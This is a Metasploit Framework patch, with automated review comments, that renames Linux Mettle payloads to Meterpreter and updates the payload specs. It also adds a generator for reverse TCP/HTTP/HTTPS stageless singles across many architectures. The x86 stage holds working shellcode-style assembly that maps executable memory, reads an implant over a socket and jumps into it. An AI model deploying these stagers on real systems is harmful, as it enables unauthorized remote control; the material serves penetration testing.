modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb index 8c4bfc4b74..84e533fe8d 100644 --- a/modules/payloads/singles/linux/zarch/mettle_reverse_tcp.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb @@ -3,7 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/meterpreter_options' require 'msf/base/sessions/mettle_config' 
@@ -21,10 +20,11 @@ module MetasploitModule super( update_info( info, - 'Name' => 'Linux Meterpreter', - 'Description' => 'Run the mettle server payload (stageless)', + 'Name' => 'Linux Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ - 'Adam Cammack ' + 'Adam Cammack ', + 'Brent Cook ' ], 'Platform' => 'linux', 'Arch' => ARCH_ZARCH, @@ -36,6 +36,7 @@ module MetasploitModule end def generate - MetasploitPayloads::Mettle.new('s390x-linux-musl', generate_config).to_binary :exec + opts = {scheme: 'tcp'} + MetasploitPayloads::Mettle.new('s390x-linux-musl', generate_config(opts)).to_binary :exec end end diff --git a/modules/payloads/stages/linux/armle/mettle.rb b/modules/payloads/stages/linux/armle/meterpreter.rb similarity index 100% rename from modules/payloads/stages/linux/armle/mettle.rb rename to modules/payloads/stages/linux/armle/meterpreter.rb diff --git a/modules/payloads/stages/linux/mipsbe/mettle.rb b/modules/payloads/stages/linux/mipsbe/meterpreter.rb similarity index 100% rename from modules/payloads/stages/linux/mipsbe/mettle.rb rename to modules/payloads/stages/linux/mipsbe/meterpreter.rb diff --git a/modules/payloads/stages/linux/mipsle/mettle.rb b/modules/payloads/stages/linux/mipsle/meterpreter.rb similarity index 100% rename from modules/payloads/stages/linux/mipsle/mettle.rb rename to modules/payloads/stages/linux/mipsle/meterpreter.rb diff --git a/modules/payloads/stages/linux/x64/mettle.rb b/modules/payloads/stages/linux/x64/meterpreter.rb similarity index 95% rename from modules/payloads/stages/linux/x64/mettle.rb rename to modules/payloads/stages/linux/x64/meterpreter.rb index 3a0505ac11..38b5defb53 100644 --- a/modules/payloads/stages/linux/x64/mettle.rb +++ b/modules/payloads/stages/linux/x64/meterpreter.rb 
@@ -4,7 +4,7 @@ ## require 'msf/core' -require 'msf/base/sessions/meterpreter_x64_mettle_linux' +require 'msf/base/sessions/meterpreter_x64_linux' require 'msf/base/sessions/meterpreter_options' require 'msf/base/sessions/mettle_config' require 'rex/elfparsey' @@ -25,7 +25,7 @@ module MetasploitModule 'Platform' => 'Linux', 'Arch' => ARCH_X64, 'License' => MSF_LICENSE, - 'Session' => Msf::Sessions::Meterpreter_x64_Mettle_Linux + 'Session' => Msf::Sessions::Meterpreter_x64_Linux ) ) end diff --git a/modules/payloads/stages/linux/x86/meterpreter.rb b/modules/payloads/stages/linux/x86/meterpreter.rb index 982b475874..008c34eb5b 100644 --- a/modules/payloads/stages/linux/x86/meterpreter.rb +++ b/modules/payloads/stages/linux/x86/meterpreter.rb 
@@ -6,171 +6,93 @@ require 'msf/core' require 'msf/base/sessions/meterpreter_x86_linux' require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' require 'rex/elfparsey' module MetasploitModule include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig def initialize(info = {}) - super(update_info(info, - 'Name' => 'Linux Meterpreter', - 'Description' => 'Inject the meterpreter server payload (staged)', - 'Author' => ['PKS', 'egypt', 'OJ Reeves'], - 'Platform' => 'linux', - 'Arch' => ARCH_X86, - 'License' => MSF_LICENSE, - 'Session' => Msf::Sessions::Meterpreter_x86_Linux)) - - register_options([ - OptInt.new('DebugOptions', [ false, "Debugging options for POSIX meterpreter", 0 ]) - ], self.class) + super( + update_info( + info, + 'Name' => 'Linux Mettle x86', + 'Description' => 'Inject the mettle server payload (staged)', + 'Author' => [ + 'William Webb ' + ], + 'Platform' => 'Linux', + 'Arch' => ARCH_X86, + 'License' => MSF_LICENSE, + 'Session' => Msf::Sessions::Meterpreter_x86_Linux + ) + ) end def elf_ep(payload) - elf = Rex::ElfParsey::Elf.new( Rex::ImageSource::Memory.new( payload ) ) - ep = elf.elf_header.e_entry - return ep + elf = Rex::ElfParsey::Elf.new(Rex::ImageSource::Memory.new(payload)) + elf.elf_header.e_entry end -=begin - def elf2bin(payload) - # XXX, not working. Use .c version - - # This code acts as a mini elf parser / memory layout linker. 
- # It will return what a elf file looks like once loaded in memory - - mem = "\x00" * (4 * 1024 * 1024) - used = 0 - - elf = Rex::ElfParsey::Elf.new( Rex::ImageSource::Memory.new( payload ) ) - - elf.program_header.each { |hdr| - if(hdr.p_type == Rex::ElfParsey::ElfBase::PT_LOAD) - print_status("Found PT_LOAD") - fileidx = hdr.p_offset & (~4095) - memidx = (hdr.p_vaddr & (~4095)) - elf.base_addr - len = hdr.p_filesz + (hdr.p_vaddr & 4095) - - mem[memidx,memidx+len] = payload[fileidx,fileidx+len] # should result in a single memcpy call :D - used += (hdr.p_memsz + (hdr.p_vaddr & 4095) + 4095) & ~4095 - end - } - - # Maybe at some stage zero out elf header / program headers in case tools - # try to look for them - - print_status("Converted ELF file to memory layout, #{payload.length} to #{used} bytes") - return mem[0, used] - end -=end - def handle_intermediate_stage(conn, payload) entry_offset = elf_ep(payload) - config_offset = payload.length - generate_meterpreter.length - encoded_entry = "0x%.8x" % entry_offset - encoded_offset = "0x%.8x" % config_offset - encoded_debug_options = "0x%.2x" % datastore['DebugOptions'].to_i + midstager_asm = %( + push edi ; save sockfd + xor ebx, ebx ; address + mov ecx, #{payload.length} ; length + mov edx, 7 ; PROT_READ | PROT_WRITE | PROT_EXECUTE + mov esi, 34 ; MAP_PRIVATE | MAP_ANONYMOUS + xor edi, edi ; fd + xor ebp, ebp ; pgoffset + mov eax, 192 ; mmap2 + int 0x80 ; syscall - # Maybe in the future patch in base. 
+ ; receive mettle process image + mov edx, eax ; save buf addr for next code block + pop ebx ; sockfd + push 0x00000100 ; MSG_WAITALL + push #{payload.length} ; size + push eax ; buf + push ebx ; sockfd + mov ecx, esp ; arg array + mov ebx, 10 ; SYS_READ + mov eax, 102 ; sys_socketcall + int 0x80 ; syscall - # Does a mmap() / read() loop of a user specified length, then - # jumps to the entry point (the \x5a's) - midstager_asm = %Q^ - midstager: - and esp, 0xFFFFF254 - push 0x4 - pop edx - mov ecx, esp - mov ebx, edi - push 0x3 - pop eax - int 0x80 - push edi - mov eax, 0xC0 - mov ebx, 0x20040000 - mov ecx, dword ptr [esp+0x4] - push 0x7 - pop edx - push 0x32 - pop esi - xor edi, edi - mov ebp, edi - dec edi - int 0x80 - cmp eax, 0xFFFFFF7F - jb start_read - terminate: - xor eax, eax - inc eax - int 0x80 ; sys_exit - start_read: - xchg ecx, edx - xchg ecx, ebx - pop ebx - read_loop: - push 0x3 - pop eax - int 0x80 ; sys_read - cmp eax, 0xFFFFFF7F - ja terminate ; exit on error - test eax, eax - je terminate ; exit on error - add ecx, eax - sub edx, eax - jne read_loop ; read more - ; edx should be at the end, but we need to adjust for the size of the config - ; block so we know where to write the socket to memory - sub ecx, #{encoded_offset} - mov [ecx], ebx ; write the socket to the config - push #{encoded_debug_options} - push ecx ; pass in the configuration pointer - mov eax, #{encoded_entry} ; put the entry point in eax - call eax - jmp terminate - ^ + ; setup stack + pop edi + xor ebx, ebx + and esp, 0xfffffff0 ; align esp + add esp, 40 + mov eax, 109 + push eax + mov esi, esp + push ebx ; NULL + push ebx ; AT_NULL + push edx ; mmap buffer + mov eax, 7 + push eax ; AT_BASE + push ebx ; end of ENV + push ebx ; NULL + push edi ; sockfd + push esi ; m + mov eax, 2 + push eax ; argc + + ; down the rabbit hole + mov eax, #{entry_offset} + add edx, eax + jmp edx + ) midstager = Metasm::Shellcode.assemble(Metasm::X86.new, midstager_asm).encode_string - - 
print_status("Transmitting intermediate stager for over-sized stage...(#{midstager.length} bytes)") - conn.put(midstager) - Rex::ThreadSafe.sleep(1.5) - - # Send length of payload - conn.put([ payload.length ].pack('V')) - return true - + vprint_status("Transmitting intermediate stager...(#{midstager.length} bytes)") + conn.put(midstager) == midstager.length end - def generate_stage(opts={}) - meterpreter = generate_meterpreter - config = generate_config(opts) - meterpreter + config - end - - def generate_meterpreter - MetasploitPayloads.read('meterpreter', 'msflinker_linux_x86.bin') - end - - def generate_config(opts={}) - opts[:uuid] ||= generate_payload_uuid - ds = opts[:datastore] || datastore - - # create the configuration block, which for staged connections is really simple. - config_opts = { - arch: opts[:uuid].arch, - exitfunk: nil, - expiration: ds['SessionExpirationTimeout'].to_i, - uuid: opts[:uuid], - transports: opts[:transport_config] || [transport_config(opts)], - extensions: [], - ascii_str: true - } - - # create the configuration instance based off the parameters - config = Rex::Payloads::Meterpreter::Config.new(config_opts) - - # return the binary version of it - config.to_b + def generate_stage(opts = {}) + MetasploitPayloads::Mettle.new('i486-linux-musl', generate_config(opts)).to_binary :process_image end end diff --git a/modules/payloads/stages/linux/x86/mettle.rb b/modules/payloads/stages/linux/x86/mettle.rb deleted file mode 100644 index f410e33bca..0000000000 --- a/modules/payloads/stages/linux/x86/mettle.rb +++ /dev/null 
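Review bot: The metadata of the rewritten stage reads `'Name' => 'Linux Mettle x86'` and `'Description' => 'Inject the mettle server payload (staged)'`, whereas every single in this commit was moved to the "Linux Meterpreter … / Meterpreter / Mettle" wording; `'Platform' => 'Linux'` is also capitalised here but `'linux'` in the singles. Because the file keeps the path stages/linux/x86/meterpreter.rb, the name shown in module listings changes from 'Linux Meterpreter' to 'Linux Mettle x86'. If that is not intended, use `'Name' => 'Linux Meterpreter'` and `'Description' => 'Inject the Meterpreter / Mettle server payload (staged)'`. The hunk also drops the registered `DebugOptions` option without saying so in the commit message, so the removal deserves a line in the description.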
@@ -1,98 +0,0 @@
-##
-# This module requires Metasploit: http://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-require 'msf/core'
-require 'msf/base/sessions/meterpreter_x86_mettle_linux'
-require 'msf/base/sessions/meterpreter_options'
-require 'msf/base/sessions/mettle_config'
-require 'rex/elfparsey'
-
-module MetasploitModule
- include Msf::Sessions::MeterpreterOptions
- include Msf::Sessions::MettleConfig
-
- def initialize(info = {})
- super(
- update_info(
- info,
- 'Name' => 'Linux Mettle x86',
- 'Description' => 'Inject the mettle server payload (staged)',
- 'Author' => [
- 'William Webb '
- ],
- 'Platform' => 'Linux',
- 'Arch' => ARCH_X86,
- 'License' => MSF_LICENSE,
- 'Session' => Msf::Sessions::Meterpreter_x86_Mettle_Linux
- )
- )
- end
-
- def elf_ep(payload)
- elf = Rex::ElfParsey::Elf.new(Rex::ImageSource::Memory.new(payload))
- elf.elf_header.e_entry
- end
-
- def handle_intermediate_stage(conn, payload)
- entry_offset = elf_ep(payload)
-
- midstager_asm = %(
- push edi ; save sockfd
- xor ebx, ebx ; address
- mov ecx, #{payload.length} ; length
- mov edx, 7 ; PROT_READ | PROT_WRITE | PROT_EXECUTE
- mov esi, 34 ; MAP_PRIVATE | MAP_ANONYMOUS
- xor edi, edi ; fd
- xor ebp, ebp ; pgoffset
- mov eax, 192 ; mmap2
- int 0x80 ; syscall
-
- ; receive mettle process image
- mov edx, eax ; save buf addr for next code block
- pop ebx ; sockfd
- push 0x00000100 ; MSG_WAITALL
- push #{payload.length} ; size
- push eax ; buf
- push ebx ; sockfd
- mov ecx, esp ; arg array
- mov ebx, 10 ; SYS_READ
- mov eax, 102 ; sys_socketcall
- int 0x80 ; syscall
-
- ; setup stack
- pop edi
- xor ebx, ebx
- and esp, 0xfffffff0 ; align esp
- add esp, 40
- mov eax, 109
- push eax
- mov esi, esp
- push ebx ; NULL
- push ebx ; AT_NULL
- push edx ; mmap buffer
- mov eax, 7
- push eax ; AT_BASE
- push ebx ; end of ENV
- push ebx ; NULL
- push edi ; sockfd
- push esi ; m
- mov eax, 2
- push eax ; argc
-
- ; down the rabbit hole
- mov
eax, #{entry_offset}
- add edx, eax
- jmp edx
- )
-
- midstager = Metasm::Shellcode.assemble(Metasm::X86.new, midstager_asm).encode_string
- vprint_status("Transmitting intermediate stager...(#{midstager.length} bytes)")
- conn.put(midstager) == midstager.length
- end
-
- def generate_stage(opts = {})
- MetasploitPayloads::Mettle.new('i486-linux-musl', generate_config(opts)).to_binary :process_image
- end
-end
diff --git a/tools/modules/generate_mettle_payloads.rb b/tools/modules/generate_mettle_payloads.rb new file mode 100755
index 0000000000..91d8bbb520
--- /dev/null
+++ b/tools/modules/generate_mettle_payloads.rb
@@ -0,0 +1,45 @@
+#!/usr/bin/env ruby
+#
+# This script generates Mettle payload wrappers
+#
+
+require 'erb'
+
+schemes = [
+ 'tcp',
+ 'http',
+ 'https'
+]
+
+arches = [
+ ['aarch64', 'aarch64-linux-musl'],
+ ['armbe', 'armv5b-linux-musleabi'],
+ ['armle', 'armv5l-linux-musleabi'],
+ ['mips64', 'mips64-linux-muslsf'],
+ ['mipsbe', 'mips-linux-muslsf'],
+ ['mipsle', 'mipsel-linux-muslsf'],
+ ['ppc', 'powerpc-linux-muslsf'],
+ ['ppc64le', 'powerpc64le-linux-musl'],
+ ['x64', 'x86_64-linux-musl'],
+ ['x86', 'i486-linux-musl'],
+ ['zarch', 's390x-linux-musl'],
+]
+
+arch = ''
+payload = ''
+scheme = ''
+cwd = File::dirname(__FILE__)
+template = File::read(File::join(cwd, 'linux_meterpreter_reverse.erb'))
+renderer = ERB.new(template)
+
+arches.each do |a, p|
+ schemes.each do |s|
+ arch = a
+ payload = p
+ scheme = s
+ filename = File::join('modules', 'payloads', 'singles', 'linux', arch, "meterpreter_reverse_#{scheme}.rb")
+ File::write(filename, renderer.result())
+ end
+end
+
+`bundle exec #{File::join(cwd, 'update_payload_cached_sizes.rb')}`
diff --git a/tools/modules/linux_meterpreter_reverse.erb b/tools/modules/linux_meterpreter_reverse.erb new file mode 100644
index 0000000000..bffd3a8edb
--- /dev/null
+++ b/tools/modules/linux_meterpreter_reverse.erb
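Review bot: The final line of generate_mettle_payloads.rb runs the size updater through a backtick command, so the interpolated path goes through a shell, the command's output is thrown away and a non-zero exit goes unnoticed. Passing the arguments as a list and checking the result avoids all three: `system('bundle', 'exec', File.join(cwd, 'update_payload_cached_sizes.rb')) || abort('update_payload_cached_sizes.rb failed')`. Separately, the template is located through `__FILE__` but `filename` is built relative to the current working directory, so the script only writes to the right tree when started from the repository root; anchoring it with `root = File.expand_path('../..', cwd)` and `File.join(root, 'modules', 'payloads', 'singles', 'linux', arch, ...)` would make that independent of where it is run. A short header comment stating that the script overwrites the existing `meterpreter_reverse_*.rb` singles would also help.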
@@ -0,0 +1,40 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_<%= scheme %>'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_<%= arch %>_linux'
+
+module MetasploitModule
+
+ include Msf::Payload::Single
+ include Msf::Sessions::MeterpreterOptions
+ include Msf::Sessions::MettleConfig
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Linux Meterpreter, Reverse <%= scheme.upcase %> Inline',
+ 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
+ 'Author' => [
+ 'Adam Cammack ',
+ 'Brent Cook '
+ ],
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_<%= arch.upcase %>,
+ 'License' => MSF_LICENSE,
+ 'Handler' => Msf::Handler::Reverse<%= scheme.capitalize %>,
+ 'Session' => Msf::Sessions::Meterpreter_<%= arch %>_Linux
+ )
+ )
+ end
+
+ def generate
+ opts = {scheme: '<%= scheme %>'}
+ MetasploitPayloads::Mettle.new('<%= payload %>', generate_config(opts)).to_binary :exec
+ end
+end
From a191e122419f80c5c118381f3f0531c9c991be7e Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Sat, 22 Apr 2017 15:00:49 -0500 Subject: [PATCH 2/7] update specs --- spec/modules/payloads_spec.rb | 532 ++++++++++++++++++++-------------- 1 file changed, 321 insertions(+), 211 deletions(-)
diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb
index 660bb2d19f..82df67ca02 100644
--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
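Review bot: The template's banner comment does not mark the rendered files as generated, so a fix made directly in one of the `meterpreter_reverse_<scheme>.rb` singles would be silently overwritten the next time generate_mettle_payloads.rb runs. I would add a line under the existing `##` banner such as `# Generated from tools/modules/linux_meterpreter_reverse.erb; edit the template and re-run generate_mettle_payloads.rb.` The `'Description'` string is also identical for all three transports, while `'Name'` already carries `<%= scheme.upcase %>`; naming the transport in the description as well would make the modules easier to tell apart in listings and logs.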
@@ -1430,136 +1430,6 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'linux/x86/exec' end - context 'linux/x86/meterpreter/bind_ipv6_tcp' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'stagers/linux/x86/bind_ipv6_tcp', - 'stages/linux/x86/meterpreter' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'linux/x86/meterpreter/bind_ipv6_tcp' - end - - context 'linux/x86/meterpreter/bind_ipv6_tcp_uuid' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'stagers/linux/x86/bind_ipv6_tcp_uuid', - 'stages/linux/x86/meterpreter' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'linux/x86/meterpreter/bind_ipv6_tcp_uuid' - end - - context 'linux/x86/meterpreter/bind_nonx_tcp' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'stagers/linux/x86/bind_nonx_tcp', - 'stages/linux/x86/meterpreter' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'linux/x86/meterpreter/bind_nonx_tcp' - end - - context 'linux/x86/meterpreter/bind_tcp' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'stagers/linux/x86/bind_tcp', - 'stages/linux/x86/meterpreter' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'linux/x86/meterpreter/bind_tcp' - end - - context 'linux/x86/meterpreter/bind_tcp_uuid' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'stagers/linux/x86/bind_tcp_uuid', - 'stages/linux/x86/meterpreter' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'linux/x86/meterpreter/bind_tcp_uuid' - end - - context 'linux/x86/meterpreter/find_tag' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'stagers/linux/x86/find_tag', - 
'stages/linux/x86/meterpreter' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'linux/x86/meterpreter/find_tag' - end - - context 'linux/x86/meterpreter/reverse_ipv6_tcp' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'stagers/linux/x86/reverse_ipv6_tcp', - 'stages/linux/x86/meterpreter' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'linux/x86/meterpreter/reverse_ipv6_tcp' - end - - context 'linux/x86/meterpreter/reverse_nonx_tcp' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'stagers/linux/x86/reverse_nonx_tcp', - 'stages/linux/x86/meterpreter' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'linux/x86/meterpreter/reverse_nonx_tcp' - end - - context 'linux/x86/meterpreter/reverse_tcp' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'stagers/linux/x86/reverse_tcp', - 'stages/linux/x86/meterpreter' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'linux/x86/meterpreter/reverse_tcp' - end - - context 'linux/x86/meterpreter/reverse_tcp_uuid' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'stagers/linux/x86/reverse_tcp_uuid', - 'stages/linux/x86/meterpreter' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'linux/x86/meterpreter/reverse_tcp_uuid' - end - - context 'linux/x86/metsvc_bind_tcp' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'singles/linux/x86/metsvc_bind_tcp' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'linux/x86/metsvc_bind_tcp' - end - - context 'linux/x86/metsvc_reverse_tcp' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 
'singles/linux/x86/metsvc_reverse_tcp' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'linux/x86/metsvc_reverse_tcp' - end - context 'linux/x86/read_file' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ 
@@ -4290,290 +4160,530 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'windows/meterpreter/reverse_winhttps' end - context 'linux/aarch64/mettle_reverse_tcp' do + context 'linux/aarch64/meterpreter_reverse_http' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ - 'singles/linux/aarch64/mettle_reverse_tcp' + 'singles/linux/aarch64/meterpreter_reverse_http' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/aarch64/mettle_reverse_tcp' + reference_name: 'linux/aarch64/meterpreter_reverse_http' end - context 'linux/armbe/mettle_reverse_tcp' do + context 'linux/aarch64/meterpreter_reverse_https' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ - 'singles/linux/armbe/mettle_reverse_tcp' + 'singles/linux/aarch64/meterpreter_reverse_https' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/armbe/mettle_reverse_tcp' + reference_name: 'linux/aarch64/meterpreter_reverse_https' end - context 'linux/armle/mettle/bind_tcp' do + context 'linux/armbe/meterpreter_reverse_http' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/armbe/meterpreter_reverse_http' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/armbe/meterpreter_reverse_http' + end + + context 'linux/armbe/meterpreter_reverse_https' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/armbe/meterpreter_reverse_https' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/armbe/meterpreter_reverse_https' + end + + context 'linux/armle/meterpreter_reverse_http' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/armle/meterpreter_reverse_http' + ], + dynamic_size: false, + modules_pathname: 
modules_pathname, + reference_name: 'linux/armle/meterpreter_reverse_http' + end + + context 'linux/armle/meterpreter_reverse_https' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/armle/meterpreter_reverse_https' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/armle/meterpreter_reverse_https' + end + + context 'linux/mips64/meterpreter_reverse_http' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/mips64/meterpreter_reverse_http' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/mips64/meterpreter_reverse_http' + end + + context 'linux/mips64/meterpreter_reverse_https' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/mips64/meterpreter_reverse_https' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/mips64/meterpreter_reverse_https' + end + + context 'linux/mipsbe/meterpreter_reverse_http' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/mipsbe/meterpreter_reverse_http' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/mipsbe/meterpreter_reverse_http' + end + + context 'linux/mipsbe/meterpreter_reverse_https' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/mipsbe/meterpreter_reverse_https' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/mipsbe/meterpreter_reverse_https' + end + + context 'linux/mipsle/meterpreter_reverse_http' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/mipsle/meterpreter_reverse_http' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 
'linux/mipsle/meterpreter_reverse_http' + end + + context 'linux/mipsle/meterpreter_reverse_https' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/mipsle/meterpreter_reverse_https' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/mipsle/meterpreter_reverse_https' + end + + context 'linux/ppc/meterpreter_reverse_http' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/ppc/meterpreter_reverse_http' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/ppc/meterpreter_reverse_http' + end + + context 'linux/ppc/meterpreter_reverse_https' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/ppc/meterpreter_reverse_https' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/ppc/meterpreter_reverse_https' + end + + context 'linux/ppc64le/meterpreter_reverse_http' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/ppc64le/meterpreter_reverse_http' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/ppc64le/meterpreter_reverse_http' + end + + context 'linux/ppc64le/meterpreter_reverse_https' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/ppc64le/meterpreter_reverse_https' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/ppc64le/meterpreter_reverse_https' + end + + context 'linux/x64/meterpreter_reverse_http' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/x64/meterpreter_reverse_http' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/x64/meterpreter_reverse_http' + end + + 
context 'linux/x64/meterpreter_reverse_https' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/x64/meterpreter_reverse_https' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/x64/meterpreter_reverse_https' + end + + context 'linux/x86/meterpreter_reverse_http' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/x86/meterpreter_reverse_http' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/x86/meterpreter_reverse_http' + end + + context 'linux/x86/meterpreter_reverse_https' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/x86/meterpreter_reverse_https' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/x86/meterpreter_reverse_https' + end + + context 'linux/x86/metsvc_bind_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/x86/metsvc_bind_tcp' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/x86/metsvc_bind_tcp' + end + + context 'linux/x86/metsvc_reverse_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/x86/metsvc_reverse_tcp' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/x86/metsvc_reverse_tcp' + end + + context 'linux/zarch/meterpreter_reverse_http' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/zarch/meterpreter_reverse_http' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/zarch/meterpreter_reverse_http' + end + + context 'linux/zarch/meterpreter_reverse_https' do + it_should_behave_like 'payload cached size is consistent', + 
ancestor_reference_names: [ + 'singles/linux/zarch/meterpreter_reverse_https' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/zarch/meterpreter_reverse_https' + end + + context 'linux/aarch64/meterpreter_reverse_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/aarch64/meterpreter_reverse_tcp' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/aarch64/meterpreter_reverse_tcp' + end + + context 'linux/armbe/meterpreter_reverse_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/armbe/meterpreter_reverse_tcp' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/armbe/meterpreter_reverse_tcp' + end + + context 'linux/armle/meterpreter/bind_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ 'stagers/linux/armle/bind_tcp', - 'stages/linux/armle/mettle' + 'stages/linux/armle/meterpreter' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/armle/mettle/bind_tcp' + reference_name: 'linux/armle/meterpreter/bind_tcp' end - context 'linux/armle/mettle/reverse_tcp' do + context 'linux/armle/meterpreter/reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ 'stagers/linux/armle/reverse_tcp', - 'stages/linux/armle/mettle' + 'stages/linux/armle/meterpreter' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/armle/mettle/reverse_tcp' + reference_name: 'linux/armle/meterpreter/reverse_tcp' end - context 'linux/armle/mettle_reverse_tcp' do + context 'linux/armle/meterpreter_reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ - 'singles/linux/armle/mettle_reverse_tcp' + 'singles/linux/armle/meterpreter_reverse_tcp' ], dynamic_size: 
